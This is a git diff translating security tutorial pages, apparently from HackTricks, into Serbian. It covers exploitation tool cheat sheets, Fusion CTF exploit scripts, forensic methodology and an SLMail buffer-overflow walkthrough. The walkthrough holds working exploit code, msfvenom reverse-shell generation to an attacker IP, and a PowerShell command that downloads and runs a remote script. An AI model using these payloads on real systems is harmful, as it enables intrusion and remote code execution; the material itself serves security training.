-**objdump -d ejecutable** —> Disas functions\ -**objdump -d ./PROGRAMA | grep FUNCION** —> Get function address\ -**objdump -d -Mintel ./shellcodeout** —> Para ver que efectivamente es nuestra shellcode y sacar los OpCodes\ -**objdump -t ./exec | grep varBss** —> Tabla de símbolos, para sacar address de variables y funciones\ -**objdump -TR ./exec | grep exit(func lib)** —> Para sacar address de funciones de librerías (GOT)\ +**objdump -d izvršni** —> Disas funkcije\ +**objdump -d ./PROGRAMA | grep FUNKCIJA** —> Dobijanje adrese funkcije\ +**objdump -d -Mintel ./shellcodeout** —> Da se vidi da je to zapravo naš shellcode i izvuče OpCodes\ +**objdump -t ./exec | grep varBss** —> Tabela simbola, da se izvuče adresa varijabli i funkcija\ +**objdump -TR ./exec | grep exit(func lib)** —> Da se izvuče adresa funkcija iz biblioteka (GOT)\ **objdump -d ./exec | grep funcCode**\ **objdump -s -j .dtors /exec**\ **objdump -s -j .got ./exec**\ -**objdump -t --dynamic-relo ./exec | grep puts** —> Saca la dirección de puts a sobreescribir en le GOT\ -**objdump -D ./exec** —> Disas ALL hasta las entradas de la plt\ +**objdump -t --dynamic-relo ./exec | grep puts** —> Izvlači adresu puts koju treba prepisati u GOT\ +**objdump -D ./exec** —> Disas SVE do ulaza u plt\ **objdump -p -/exec**\ -**Info functions strncmp —>** Info de la función en gdb +**Info functions strncmp —>** Info o funkciji u gdb -## Interesting courses +## Zanimljivi kursevi - [https://guyinatuxedo.github.io/](https://guyinatuxedo.github.io) - [https://github.com/RPISEC/MBE](https://github.com/RPISEC/MBE) - [https://ir0nstone.gitbook.io/notes](https://ir0nstone.gitbook.io/notes) -## **References** +## **Reference** - [**https://guyinatuxedo.github.io/7.2-mitigation_relro/index.html**](https://guyinatuxedo.github.io/7.2-mitigation_relro/index.html) diff --git a/src/exploiting/linux-exploiting-basic-esp/fusion.md b/src/exploiting/linux-exploiting-basic-esp/fusion.md index 344a72d02..ddd6ae485 100644 
--- a/src/exploiting/linux-exploiting-basic-esp/fusion.md +++ b/src/exploiting/linux-exploiting-basic-esp/fusion.md @@ -4,9 +4,8 @@ [http://exploit-exercises.lains.space/fusion/level00/](http://exploit-exercises.lains.space/fusion/level00/) -1. Get offset to modify EIP -2. Put shellcode address in EIP - +1. Dobijte offset za modifikaciju EIP +2. Stavite adresu shellcode-a u EIP ```python from pwn import * @@ -32,9 +31,7 @@ r.recvline() r.send(buf) r.interactive() ``` - # Level01 - ```python from pwn import * @@ -60,5 +57,4 @@ buf += "\x65\xd9\x0f\x01" r.send(buf) r.interactive() ``` - {{#include ../../banners/hacktricks-training.md}} diff --git a/src/exploiting/tools/README.md b/src/exploiting/tools/README.md index 0ca40e712..771a164ce 100644 --- a/src/exploiting/tools/README.md +++ b/src/exploiting/tools/README.md @@ -1,9 +1,8 @@ -# Exploiting Tools +# Alati za Eksploataciju {{#include ../../banners/hacktricks-training.md}} ## Metasploit - ``` pattern_create.rb -l 3000 #Length pattern_offset.rb -l 3000 -q 5f97d534 #Search offset @@ -11,31 +10,23 @@ nasm_shell.rb nasm> jmp esp #Get opcodes msfelfscan -j esi /opt/fusion/bin/level01 ``` - ### Shellcodes - ``` msfvenom /p windows/shell_reverse_tcp LHOST= LPORT= [EXITFUNC=thread] [-e x86/shikata_ga_nai] -b "\x00\x0a\x0d" -f c ``` - ## GDB -### Install - +### Instaliraj ``` apt-get install gdb ``` - -### Parameters - +### Parametri ```bash -q # No show banner -x # Auto-execute GDB instructions from here -p # Attach to process ``` - -### Instructions - +### Uputstva ```bash run # Execute start # Start and break in main @@ -81,9 +72,7 @@ x/s pointer # String pointed by the pointer x/xw &pointer # Address where the pointer is located x/i $eip # Instructions of the EIP ``` - ### [GEF](https://github.com/hugsy/gef) - ```bash help memory # Get help on memory command canary # Search for canary value in memory 
@@ -113,34 +102,32 @@ shellcode get 61 #Download shellcode number 61 1- Put a bp after the function that overwrites the RIP and send a ppatern to ovwerwrite it 2- ef➤ i f Stack level 0, frame at 0x7fffffffddd0: - rip = 0x400cd3; saved rip = 0x6261617762616176 - called by frame at 0x7fffffffddd8 - Arglist at 0x7fffffffdcf8, args: - Locals at 0x7fffffffdcf8, Previous frame's sp is 0x7fffffffddd0 - Saved registers: - rbp at 0x7fffffffddc0, rip at 0x7fffffffddc8 +rip = 0x400cd3; saved rip = 0x6261617762616176 +called by frame at 0x7fffffffddd8 +Arglist at 0x7fffffffdcf8, args: +Locals at 0x7fffffffdcf8, Previous frame's sp is 0x7fffffffddd0 +Saved registers: +rbp at 0x7fffffffddc0, rip at 0x7fffffffddc8 gef➤ pattern search 0x6261617762616176 [+] Searching for '0x6261617762616176' [+] Found at offset 184 (little-endian search) likely ``` +### Trikovi -### Tricks +#### GDB iste adrese -#### GDB same addresses - -While debugging GDB will have **slightly different addresses than the used by the binary when executed.** You can make GDB have the same addresses by doing: +Dok debagujete, GDB će imati **malo drugačije adrese od onih koje koristi binarni fajl kada se izvršava.** Možete učiniti da GDB ima iste adrese tako što ćete: - `unset env LINES` - `unset env COLUMNS` -- `set env _=` _Put the absolute path to the binary_ -- Exploit the binary using the same absolute route -- `PWD` and `OLDPWD` must be the same when using GDB and when exploiting the binary +- `set env _=` _Unesite apsolutnu putanju do binarnog fajla_ +- Iskoristite binarni fajl koristeći istu apsolutnu putanju +- `PWD` i `OLDPWD` moraju biti isti kada koristite GDB i kada eksploatišete binarni fajl -#### Backtrace to find functions called - -When you have a **statically linked binary** all the functions will belong to the binary (and no to external libraries). 
In this case it will be difficult to **identify the flow that the binary follows to for example ask for user input**.\ -You can easily identify this flow by **running** the binary with **gdb** until you are asked for input. Then, stop it with **CTRL+C** and use the **`bt`** (**backtrace**) command to see the functions called: +#### Backtrace za pronalaženje pozvanih funkcija +Kada imate **staticki povezani binarni fajl**, sve funkcije će pripadati binarnom fajlu (a ne spoljnim bibliotekama). U ovom slučaju će biti teško **identifikovati tok koji binarni fajl prati da bi, na primer, zatražio unos od korisnika.**\ +Možete lako identifikovati ovaj tok tako što ćete **pokrenuti** binarni fajl sa **gdb** dok ne zatraži unos. Zatim, zaustavite ga sa **CTRL+C** i koristite **`bt`** (**backtrace**) komandu da vidite pozvane funkcije: ``` gef➤ bt #0 0x00000000004498ae in ?? () 
@@ -149,79 +136,74 @@ gef➤ bt #3 0x00000000004011a9 in ?? () #4 0x0000000000400a5a in ?? () ``` - ### GDB server -`gdbserver --multi 0.0.0.0:23947` (in IDA you have to fill the absolute path of the executable in the Linux machine and in the Windows machine) +`gdbserver --multi 0.0.0.0:23947` (u IDA morate uneti apsolutnu putanju izvršne datoteke na Linux mašini i na Windows mašini) ## Ghidra -### Find stack offset +### Pronađi offset steka -**Ghidra** is very useful to find the the **offset** for a **buffer overflow thanks to the information about the position of the local variables.**\ -For example, in the example below, a buffer flow in `local_bc` indicates that you need an offset of `0xbc`. Moreover, if `local_10` is a canary cookie it indicates that to overwrite it from `local_bc` there is an offset of `0xac`.\ -_Remember that the first 0x08 from where the RIP is saved belongs to the RBP._ +**Ghidra** je veoma korisna za pronalaženje **offset-a** za **buffer overflow zahvaljujući informacijama o poziciji lokalnih varijabli.**\ +Na primer, u primeru ispod, buffer flow u `local_bc` ukazuje da vam je potreban offset od `0xbc`. 
Štaviše, ako je `local_10` kanarska kolačić, to ukazuje da da biste ga prepisali iz `local_bc` postoji offset od `0xac`.\ +_Pamti da prvih 0x08 odakle se čuva RIP pripada RBP-u._ ![](<../../images/image (616).png>) ## GCC -**gcc -fno-stack-protector -D_FORTIFY_SOURCE=0 -z norelro -z execstack 1.2.c -o 1.2** --> Compile without protections\ -**-o** --> Output\ -**-g** --> Save code (GDB will be able to see it)\ -**echo 0 > /proc/sys/kernel/randomize_va_space** --> To deactivate the ASLR in linux +**gcc -fno-stack-protector -D_FORTIFY_SOURCE=0 -z norelro -z execstack 1.2.c -o 1.2** --> Kompajliraj bez zaštita\ +**-o** --> Izlaz\ +**-g** --> Sačuvaj kod (GDB će moći da ga vidi)\ +**echo 0 > /proc/sys/kernel/randomize_va_space** --> Da deaktivira ASLR u linuxu -**To compile a shellcode:**\ -**nasm -f elf assembly.asm** --> return a ".o"\ -**ld assembly.o -o shellcodeout** --> Executable +**Da kompajlirate shellcode:**\ +**nasm -f elf assembly.asm** --> vraća ".o"\ +**ld assembly.o -o shellcodeout** --> Izvršna datoteka ## Objdump -**-d** --> **Disassemble executable** sections (see opcodes of a compiled shellcode, find ROP Gadgets, find function address...)\ -**-Mintel** --> **Intel** syntax\ -**-t** --> **Symbols** table\ -**-D** --> **Disassemble all** (address of static variable)\ -**-s -j .dtors** --> dtors section\ -**-s -j .got** --> got section\ -\-D -s -j .plt --> **plt** section **decompiled**\ -**-TR** --> **Relocations**\ -**ojdump -t --dynamic-relo ./exec | grep puts** --> Address of "puts" to modify in GOT\ -**objdump -D ./exec | grep "VAR_NAME"** --> Address or a static variable (those are stored in DATA section). 
+**-d** --> **Disasembliraj izvršne** sekcije (vidi opkode kompajliranog shellcode-a, pronađi ROP Gadgets, pronađi adresu funkcije...)\ +**-Mintel** --> **Intel** sintaksa\ +**-t** --> **Tabela** simbola\ +**-D** --> **Disasembliraj sve** (adresa statične varijable)\ +**-s -j .dtors** --> dtors sekcija\ +**-s -j .got** --> got sekcija\ +\-D -s -j .plt --> **plt** sekcija **dekompilirana**\ +**-TR** --> **Relokacije**\ +**ojdump -t --dynamic-relo ./exec | grep puts** --> Adresa "puts" za modifikaciju u GOT\ +**objdump -D ./exec | grep "VAR_NAME"** --> Adresa ili statična varijabla (one se čuvaju u DATA sekciji). ## Core dumps -1. Run `ulimit -c unlimited` before starting my program -2. Run `sudo sysctl -w kernel.core_pattern=/tmp/core-%e.%p.%h.%t` +1. Pokrenite `ulimit -c unlimited` pre nego što pokrenete moj program +2. Pokrenite `sudo sysctl -w kernel.core_pattern=/tmp/core-%e.%p.%h.%t` 3. sudo gdb --core=\ --quiet -## More +## Više -**ldd executable | grep libc.so.6** --> Address (if ASLR, then this change every time)\ -**for i in \`seq 0 20\`; do ldd \ | grep libc; done** --> Loop to see if the address changes a lot\ -**readelf -s /lib/i386-linux-gnu/libc.so.6 | grep system** --> Offset of "system"\ -**strings -a -t x /lib/i386-linux-gnu/libc.so.6 | grep /bin/sh** --> Offset of "/bin/sh" +**ldd izvršna datoteka | grep libc.so.6** --> Adresa (ako je ASLR, onda se ovo menja svaki put)\ +**for i in \`seq 0 20\`; do ldd \ | grep libc; done** --> Petlja da vidi da li se adresa mnogo menja\ +**readelf -s /lib/i386-linux-gnu/libc.so.6 | grep system** --> Offset "system"\ +**strings -a -t x /lib/i386-linux-gnu/libc.so.6 | grep /bin/sh** --> Offset "/bin/sh" -**strace executable** --> Functions called by the executable\ -**rabin2 -i ejecutable -->** Address of all the functions +**strace izvršna datoteka** --> Funkcije koje poziva izvršna datoteka\ +**rabin2 -i ejecutable -->** Adresa svih funkcija ## **Inmunity debugger** - ```bash !mona modules #Get protections, look 
for all false except last one (Dll of SO) !mona find -s "\xff\xe4" -m name_unsecure.dll #Search for opcodes insie dll space (JMP ESP) ``` - ## IDA -### Debugging in remote linux - -Inside the IDA folder you can find binaries that can be used to debug a binary inside a linux. To do so move the binary _linux_server_ or _linux_server64_ inside the linux server and run it nside the folder that contains the binary: +### Debugging u udaljenom linuxu +Unutar IDA fascikle možete pronaći binarne datoteke koje se mogu koristiti za debagovanje binarne datoteke unutar linuxa. Da biste to uradili, premestite binarnu datoteku _linux_server_ ili _linux_server64_ unutar linux servera i pokrenite je unutar fascikle koja sadrži binarnu datoteku: ``` ./linux_server64 -Ppass ``` - -Then, configure the debugger: Debugger (linux remote) --> Proccess options...: +Zatim, konfigurišite debager: Debugger (linux remote) --> Opcije procesa...: ![](<../../images/image (101).png>) diff --git a/src/exploiting/tools/pwntools.md b/src/exploiting/tools/pwntools.md index a7c0aa204..29e8800e1 100644 --- a/src/exploiting/tools/pwntools.md +++ b/src/exploiting/tools/pwntools.md 
@@ -1,118 +1,98 @@ {{#include ../../banners/hacktricks-training.md}} - ``` pip3 install pwntools ``` - # Pwn asm -Get opcodes from line or file. - +Dobijte opkode iz linije ili fajla. ``` pwn asm "jmp esp" pwn asm -i ``` +**Može se odabrati:** -**Can select:** - -- output type (raw,hex,string,elf) -- output file context (16,32,64,linux,windows...) -- avoid bytes (new lines, null, a list) -- select encoder debug shellcode using gdb run the output +- tip izlaza (raw, hex, string, elf) +- kontekst izlaza (16, 32, 64, linux, windows...) +- izbegavanje bajtova (nove linije, null, lista) +- odabrati enkoder za debagovanje shellcode-a koristeći gdb za pokretanje izlaza # **Pwn checksec** -Checksec script - +Checksec skripta ``` pwn checksec ``` - # Pwn constgrep # Pwn cyclic -Get a pattern - +Dobijte obrazac ``` pwn cyclic 3000 pwn cyclic -l faad ``` +**Može se odabrati:** -**Can select:** - -- The used alphabet (lowercase chars by default) -- Length of uniq pattern (default 4) -- context (16,32,64,linux,windows...) -- Take the offset (-l) +- Korišćeni alfabet (mala slova po defaultu) +- Dužina jedinstvenog obrasca (podrazumevano 4) +- kontekst (16,32,64,linux,windows...) +- Uzmite pomak (-l) # Pwn debug -Attach GDB to a process - +Priključite GDB na proces ``` pwn debug --exec /bin/bash pwn debug --pid 1234 pwn debug --process bash ``` +**Može se odabrati:** -**Can select:** - -- By executable, by name or by pid context (16,32,64,linux,windows...) -- gdbscript to execute +- Po izvršnom fajlu, po imenu ili po pid kontekstu (16,32,64,linux,windows...) +- gdbscript za izvršavanje - sysrootpath # Pwn disablenx -Disable nx of a binary - +Onemogući nx binarnog fajla ``` pwn disablenx ``` - # Pwn disasm -Disas hex opcodes - +Disas hex opkode ``` pwn disasm ffe4 ``` +**Može se izabrati:** -**Can select:** - -- context (16,32,64,linux,windows...) -- base addres -- color(default)/no color +- kontekst (16,32,64,linux,windows...) 
+- osnovna adresa +- boja(podrazumevano)/bez boje # Pwn elfdiff -Print differences between 2 fiels - +Ispisuje razlike između 2 fajla ``` pwn elfdiff ``` - # Pwn hex -Get hexadecimal representation - +Dobijte heksadecimalnu reprezentaciju ```bash pwn hex hola #Get hex of "hola" ascii ``` - # Pwn phd -Get hexdump - +Dobijte hexdump ``` pwn phd ``` +**Može se odabrati:** -**Can select:** - -- Number of bytes to show -- Number of bytes per line highlight byte -- Skip bytes at beginning +- Broj bajtova za prikaz +- Broj bajtova po liniji istaknutih bajtova +- Preskoči bajtove na početku # Pwn pwnstrip @@ -120,8 +100,7 @@ pwn phd # Pwn shellcraft -Get shellcodes - +Dobijanje shellcode-a ``` pwn shellcraft -l #List shellcodes pwn shellcraft -l amd #Shellcode with amd in the name 
@@ -129,46 +108,39 @@ pwn shellcraft -f hex amd64.linux.sh #Create in C and run pwn shellcraft -r amd64.linux.sh #Run to test. Get shell pwn shellcraft .r amd64.linux.bindsh 9095 #Bind SH to port ``` +**Može se izabrati:** -**Can select:** +- shellcode i argumenti za shellcode +- Izlazna datoteka +- format izlaza +- debagovanje (priključiti dbg na shellcode) +- pre (debug trap pre koda) +- posle +- izbegavati korišćenje opkoda (podrazumevano: nije null i nova linija) +- Pokreni shellcode +- Boja/bez boje +- lista syscalls +- lista mogućih shellcode-ova +- Generiši ELF kao deljenu biblioteku -- shellcode and arguments for the shellcode -- Out file -- output format -- debug (attach dbg to shellcode) -- before (debug trap before code) -- after -- avoid using opcodes (default: not null and new line) -- Run the shellcode -- Color/no color -- list syscalls -- list possible shellcodes -- Generate ELF as a shared library - -# Pwn template - -Get a python template +# Pwn šablon +Dobijte python šablon ``` pwn template ``` - -**Can select:** host, port, user, pass, path and quiet +**Može se odabrati:** host, port, user, pass, path i quiet # Pwn unhex -From hex to string - +Iz heksa u string ``` pwn unhex 686f6c61 ``` +# Pwn ažuriranje -# Pwn update - -To update pwntools - +Da biste ažurirali pwntools ``` pwn update ``` - {{#include ../../banners/hacktricks-training.md}} diff --git a/src/exploiting/windows-exploiting-basic-guide-oscp-lvl.md b/src/exploiting/windows-exploiting-basic-guide-oscp-lvl.md index 1f8119bb8..3029ab7d3 100644 --- a/src/exploiting/windows-exploiting-basic-guide-oscp-lvl.md +++ b/src/exploiting/windows-exploiting-basic-guide-oscp-lvl.md 
@@ -1,21 +1,18 @@ -# Windows Exploiting (Basic Guide - OSCP lvl) +# Windows Exploiting (Osnovni vodič - OSCP nivo) {{#include ../banners/hacktricks-training.md}} -## **Start installing the SLMail service** +## **Počnite sa instalacijom SLMail servisa** -## Restart SLMail service - -Every time you need to **restart the service SLMail** you can do it using the windows console: +## Ponovo pokrenite SLMail servis +Svaki put kada treba da **ponovo pokrenete servis SLMail** možete to uraditi koristeći Windows konzolu: ``` net start slmail ``` - ![](<../images/image (23) (1).png>) -## Very basic python exploit template - +## Veoma osnovni python exploit šablon ```python #!/usr/bin/python 
@@ -27,99 +24,89 @@ port = 110 buffer = 'A' * 2700 try: - print "\nLaunching exploit..." - s.connect((ip, port)) - data = s.recv(1024) - s.send('USER username' +'\r\n') - data = s.recv(1024) - s.send('PASS ' + buffer + '\r\n') - print "\nFinished!." +print "\nLaunching exploit..." +s.connect((ip, port)) +data = s.recv(1024) +s.send('USER username' +'\r\n') +data = s.recv(1024) +s.send('PASS ' + buffer + '\r\n') +print "\nFinished!." except: - print "Could not connect to "+ip+":"+port +print "Could not connect to "+ip+":"+port ``` +## **Promenite font Immunity Debuggera** -## **Change Immunity Debugger Font** +Idite na `Options >> Appearance >> Fonts >> Change(Consolas, Blod, 9) >> OK` -Go to `Options >> Appearance >> Fonts >> Change(Consolas, Blod, 9) >> OK` - -## **Attach the proces to Immunity Debugger:** +## **Priključite proces na Immunity Debugger:** **File --> Attach** ![](<../images/image (24) (1) (1).png>) -**And press START button** +**I pritisnite START dugme** -## **Send the exploit and check if EIP is affected:** +## **Pošaljite exploit i proverite da li je EIP pogođen:** ![](<../images/image (25) (1) (1).png>) -Every time you break the service you should restart it as is indicated in the beginnig of this page. +Svaki put kada prekinete servis, trebate ga ponovo pokrenuti kao što je naznačeno na početku ove stranice. -## Create a pattern to modify the EIP +## Napravite obrazac za modifikaciju EIP-a -The pattern should be as big as the buffer you used to broke the service previously. +Obrazac bi trebao biti dovoljno velik kao buffer koji ste koristili da prekinete servis ranije. ![](<../images/image (26) (1) (1).png>) - ``` /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 3000 ``` +Promenite bafer eksploita i postavite obrazac, a zatim pokrenite eksploataciju. -Change the buffer of the exploit and set the pattern and lauch the exploit. 
- -A new crash should appeard, but with a different EIP address: +Treba da se pojavi novi pad, ali sa drugačijom EIP adresom: ![](<../images/image (27) (1) (1).png>) -Check if the address was in your pattern: +Proverite da li je adresa bila u vašem obrascu: ![](<../images/image (28) (1) (1).png>) - ``` /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l 3000 -q 39694438 ``` +Izgleda da **možemo modifikovati EIP na offsetu 2606** bafera. -Looks like **we can modify the EIP in offset 2606** of the buffer. - -Check it modifing the buffer of the exploit: - +Proverite to modifikujući bafer eksploita: ``` buffer = 'A'*2606 + 'BBBB' + 'CCCC' ``` - -With this buffer the EIP crashed should point to 42424242 ("BBBB") +Sa ovim baferom EIP se srušio i treba da pokazuje na 42424242 ("BBBB") ![](<../images/image (30) (1) (1).png>) ![](<../images/image (29) (1) (1).png>) -Looks like it is working. +Izgleda da radi. -## Check for Shellcode space inside the stack +## Proverite prostor za Shellcode unutar steka -600B should be enough for any powerfull shellcode. - -Lets change the bufer: +600B bi trebalo da bude dovoljno za bilo koji moćan shellcode. +Hajde da promenimo bafer: ``` buffer = 'A'*2606 + 'BBBB' + 'C'*600 ``` - -launch the new exploit and check the EBP and the length of the usefull shellcode +pokrenite novi exploit i proverite EBP i dužinu korisnog shellcode-a ![](<../images/image (31) (1).png>) ![](<../images/image (32) (1).png>) -You can see that when the vulnerability is reached, the EBP is pointing to the shellcode and that we have a lot of space to locate a shellcode here. +Možete videti da kada se dođe do ranjivosti, EBP pokazuje na shellcode i da imamo puno prostora da lociramo shellcode ovde. -In this case we have **from 0x0209A128 to 0x0209A2D6 = 430B.** Enough. +U ovom slučaju imamo **od 0x0209A128 do 0x0209A2D6 = 430B.** Dovoljno. 
-## Check for bad chars - -Change again the buffer: +## Proverite loše karaktere +Ponovo promenite bafer: ``` badchars = ( "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10" @@ -141,30 +128,27 @@ badchars = ( ) buffer = 'A'*2606 + 'BBBB' + badchars ``` +Badchars počinju od 0x01 jer je 0x00 gotovo uvek loš. -The badchars starts in 0x01 because 0x00 is almost always bad. +Izvršavajte eksploataciju ponovo sa ovim novim baferom brišući karaktere za koje se utvrdi da su beskorisni: -Execute repeatedly the exploit with this new buffer delenting the chars that are found to be useless:. +Na primer: -For example: - -In this case you can see that **you shouldn't use the char 0x0A** (nothing is saved in memory since the char 0x09). +U ovom slučaju možete videti da **ne biste trebali koristiti karakter 0x0A** (ništa se ne čuva u memoriji pošto je karakter 0x09). ![](<../images/image (33) (1).png>) -In this case you can see that **the char 0x0D is avoided**: +U ovom slučaju možete videti da **se karakter 0x0D izbegava**: ![](<../images/image (34) (1).png>) -## Find a JMP ESP as a return address - -Using: +## Pronađite JMP ESP kao adresu povratka +Koristeći: ``` !mona modules #Get protections, look for all false except last one (Dll of SO) ``` - -You will **list the memory maps**. Search for some DLl that has: +Ćete **navesti mape memorije**. Potražite neki DLL koji ima: - **Rebase: False** - **SafeSEH: False** 
@@ -174,30 +158,25 @@ You will **list the memory maps**. Search for some DLl that has: ![](<../images/image (35) (1).png>) -Now, inside this memory you should find some JMP ESP bytes, to do that execute: - +Sada, unutar ove memorije trebali biste pronaći neke JMP ESP bajtove, da biste to uradili izvršite: ``` !mona find -s "\xff\xe4" -m name_unsecure.dll # Search for opcodes insie dll space (JMP ESP) !mona find -s "\xff\xe4" -m slmfc.dll # Example in this case ``` - -**Then, if some address is found, choose one that don't contain any badchar:** +**Zatim, ako se pronađe neka adresa, izaberite onu koja ne sadrži nikakve badchar:** ![](<../images/image (36) (1).png>) -**In this case, for example: \_0x5f4a358f**\_ - -## Create shellcode +**U ovom slučaju, na primer: \_0x5f4a358f**\_ +## Kreirajte shellcode ``` msfvenom -p windows/shell_reverse_tcp LHOST=10.11.0.41 LPORT=443 -f c -b '\x00\x0a\x0d' msfvenom -a x86 --platform Windows -p windows/exec CMD="powershell \"IEX(New-Object Net.webClient).downloadString('http://10.11.0.41/nishang.ps1')\"" -f python -b '\x00\x0a\x0d' ``` +Ako eksploatacija ne funkcioniše, ali bi trebala (možete videti sa ImDebg da je shellcode dostignut), pokušajte da kreirate druge shellcode-ove (msfvenom sa kreiranjem različitih shellcode-ova za iste parametre). -If the exploit is not working but it should (you can see with ImDebg that the shellcode is reached), try to create other shellcodes (msfvenom with create different shellcodes for the same parameters). - -**Add some NOPS at the beginning** of the shellcode and use it and the return address to JMP ESP, and finish the exploit: - +**Dodajte neke NOPS na početak** shellcode-a i koristite ga zajedno sa povratnom adresom za JMP ESP, i završite eksploataciju: ```bash #!/usr/bin/python 
@@ -236,26 +215,23 @@ shellcode = ( buffer = 'A' * 2606 + '\x8f\x35\x4a\x5f' + "\x90" * 8 + shellcode try: - print "\nLaunching exploit..." - s.connect((ip, port)) - data = s.recv(1024) - s.send('USER username' +'\r\n') - data = s.recv(1024) - s.send('PASS ' + buffer + '\r\n') - print "\nFinished!." +print "\nLaunching exploit..." +s.connect((ip, port)) +data = s.recv(1024) +s.send('USER username' +'\r\n') +data = s.recv(1024) +s.send('PASS ' + buffer + '\r\n') +print "\nFinished!." except: - print "Could not connect to "+ip+":"+port +print "Could not connect to "+ip+":"+port ``` - > [!WARNING] -> There are shellcodes that will **overwrite themselves**, therefore it's important to always add some NOPs before the shellcode +> Postoje shellcode-ovi koji će **prepisati sebe**, stoga je važno uvek dodati nekoliko NOP-ova pre shellcode-a -## Improving the shellcode - -Add this parameters: +## Poboljšanje shellcode-a +Dodajte ove parametre: ``` EXITFUNC=thread -e x86/shikata_ga_nai ``` - {{#include ../banners/hacktricks-training.md}} diff --git a/src/forensics/basic-forensic-methodology/README.md b/src/forensics/basic-forensic-methodology/README.md index e725dfa85..fcf7aaefc 100644 --- a/src/forensics/basic-forensic-methodology/README.md +++ b/src/forensics/basic-forensic-methodology/README.md 
@@ -1,30 +1,30 @@ -# Basic Forensic Methodology +# Osnovna Forenzička Metodologija {{#include ../../banners/hacktricks-training.md}} -## Creating and Mounting an Image +## Kreiranje i Montiranje Slike {{#ref}} ../../generic-methodologies-and-resources/basic-forensic-methodology/image-acquisition-and-mount.md {{#endref}} -## Malware Analysis +## Analiza Malvera -This **isn't necessary the first step to perform once you have the image**. But you can use this malware analysis techniques independently if you have a file, a file-system image, memory image, pcap... so it's good to **keep these actions in mind**: +Ovo **nije nužno prvi korak koji treba preduzeti kada imate sliku**. Ali možete koristiti ove tehnike analize malvera nezavisno ako imate datoteku, sliku datotečnog sistema, sliku memorije, pcap... tako da je dobro **imati na umu ove akcije**: {{#ref}} malware-analysis.md {{#endref}} -## Inspecting an Image +## Istraživanje Slike -if you are given a **forensic image** of a device you can start **analyzing the partitions, file-system** used and **recovering** potentially **interesting files** (even deleted ones). Learn how in: +Ako dobijete **forenzičku sliku** uređaja, možete početi **analizirati particije, datotečni sistem** koji se koristi i **opraviti** potencijalno **zanimljive datoteke** (čak i obrisane). Saznajte kako u: {{#ref}} partitions-file-systems-carving/ {{#endref}} -Depending on the used OSs and even platform different interesting artifacts should be searched: +U zavisnosti od korišćenih OS-ova i čak platformi, različiti zanimljivi artefakti treba da se pretražuju: {{#ref}} windows-forensics/ 
@@ -38,42 +38,42 @@ linux-forensics.md docker-forensics.md {{#endref}} -## Deep inspection of specific file-types and Software +## Dubinska Inspekcija Specifičnih Tipova Datoteka i Softvera -If you have very **suspicious** **file**, then **depending on the file-type and software** that created it several **tricks** may be useful.\ -Read the following page to learn some interesting tricks: +Ako imate vrlo **sumnjivu** **datoteku**, onda **u zavisnosti od tipa datoteke i softvera** koji je kreirao, nekoliko **trikova** može biti korisno.\ +Pročitajte sledeću stranicu da biste saznali neke zanimljive trikove: {{#ref}} specific-software-file-type-tricks/ {{#endref}} -I want to do a special mention to the page: +Želim da posebno pomenem stranicu: {{#ref}} specific-software-file-type-tricks/browser-artifacts.md {{#endref}} -## Memory Dump Inspection +## Inspekcija Dump-a Memorije {{#ref}} memory-dump-analysis/ {{#endref}} -## Pcap Inspection +## Inspekcija Pcap-a {{#ref}} pcap-inspection/ {{#endref}} -## **Anti-Forensic Techniques** +## **Anti-forenzičke Tehnike** -Keep in mind the possible use of anti-forensic techniques: +Imajte na umu moguću upotrebu anti-forenzičkih tehnika: {{#ref}} anti-forensic-techniques.md {{#endref}} -## Threat Hunting +## Lov na Pretnje {{#ref}} file-integrity-monitoring.md diff --git a/src/forensics/basic-forensic-methodology/anti-forensic-techniques.md b/src/forensics/basic-forensic-methodology/anti-forensic-techniques.md index 615ede378..9aa944ac3 100644 --- a/src/forensics/basic-forensic-methodology/anti-forensic-techniques.md +++ b/src/forensics/basic-forensic-methodology/anti-forensic-techniques.md @@ -1,159 +1,151 @@ {{#include ../../banners/hacktricks-training.md}} -
+# Vremenske oznake -{% embed url="https://websec.nl/" %} +Napadač može biti zainteresovan za **promenu vremenskih oznaka datoteka** kako bi izbegao otkrivanje.\ +Moguće je pronaći vremenske oznake unutar MFT u atributima `$STANDARD_INFORMATION` ** i ** `$FILE_NAME`. -# Timestamps +Oba atributa imaju 4 vremenske oznake: **Izmena**, **pristup**, **kreiranje** i **izmena MFT registra** (MACE ili MACB). -An attacker may be interested in **changing the timestamps of files** to avoid being detected.\ -It's possible to find the timestamps inside the MFT in attributes `$STANDARD_INFORMATION` ** and ** `$FILE_NAME`. +**Windows explorer** i drugi alati prikazuju informacije iz **`$STANDARD_INFORMATION`**. -Both attributes have 4 timestamps: **Modification**, **access**, **creation**, and **MFT registry modification** (MACE or MACB). +## TimeStomp - Anti-forenzički alat -**Windows explorer** and other tools show the information from **`$STANDARD_INFORMATION`**. - -## TimeStomp - Anti-forensic Tool - -This tool **modifies** the timestamp information inside **`$STANDARD_INFORMATION`** **but** **not** the information inside **`$FILE_NAME`**. Therefore, it's possible to **identify** **suspicious** **activity**. +Ovaj alat **menja** informacije o vremenskim oznakama unutar **`$STANDARD_INFORMATION`** **ali** **ne** informacije unutar **`$FILE_NAME`**. Stoga, moguće je **identifikovati** **sumnjivu** **aktivnost**. ## Usnjrnl -The **USN Journal** (Update Sequence Number Journal) is a feature of the NTFS (Windows NT file system) that keeps track of volume changes. The [**UsnJrnl2Csv**](https://github.com/jschicht/UsnJrnl2Csv) tool allows for the examination of these changes. +**USN Journal** (Dnevnik broja ažuriranja) je funkcija NTFS (Windows NT datotečni sistem) koja prati promene na volumenu. Alat [**UsnJrnl2Csv**](https://github.com/jschicht/UsnJrnl2Csv) omogućava ispitivanje ovih promena. 
![](<../../images/image (449).png>) -The previous image is the **output** shown by the **tool** where it can be observed that some **changes were performed** to the file. +Prethodna slika je **izlaz** prikazan od strane **alata** gde se može primetiti da su neke **promene izvršene** na datoteci. ## $LogFile -**All metadata changes to a file system are logged** in a process known as [write-ahead logging](https://en.wikipedia.org/wiki/Write-ahead_logging). The logged metadata is kept in a file named `**$LogFile**`, located in the root directory of an NTFS file system. Tools such as [LogFileParser](https://github.com/jschicht/LogFileParser) can be used to parse this file and identify changes. +**Sve promene metapodataka na datotečnom sistemu se beleže** u procesu poznatom kao [write-ahead logging](https://en.wikipedia.org/wiki/Write-ahead_logging). Beleženi metapodaci se čuvaju u datoteci nazvanoj `**$LogFile**`, koja se nalazi u korenskom direktorijumu NTFS datotečnog sistema. Alati kao što su 